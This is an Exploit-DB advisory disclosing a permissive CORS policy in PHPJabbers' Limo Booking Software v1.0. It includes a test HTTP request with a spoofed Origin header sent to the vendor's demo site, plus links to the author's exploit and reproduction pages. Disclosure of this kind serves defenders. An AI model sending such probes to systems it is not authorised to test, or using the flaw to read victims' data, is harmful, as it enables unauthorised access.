Limo Booking Software v1.0 - CORS

EDB-ID:

51744

CVE:

N/A




Platform:

PHP

Date:

2023-10-09


## Title: Limo Booking Software v1.0 - CORS 
## Author: nu11secur1ty
## Date: 09/08/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/limo-booking-software/#sectionDemo
## Reference: https://portswigger.net/web-security/cors

## Description:
The application implements an HTML5 cross-origin resource sharing
(CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin http://wioydcbiourl.com
Since the Vary: Origin header was not present in the response, reverse
proxies and intermediate servers may cache it. This may enable an
attacker to carry out cache poisoning attacks. The attacker can get
some of the software resources of the victim without the victim
knowing this.

STATUS: HIGH Vulnerability

[+]Test Payload:
```
GET /1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141
Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://wioydcbiourl.com
Referer: http://demo.phpjabbers.com/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Limo-Booking-Software-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/limo-booking-software-10-cors.html)

## Time spent:
00:35:00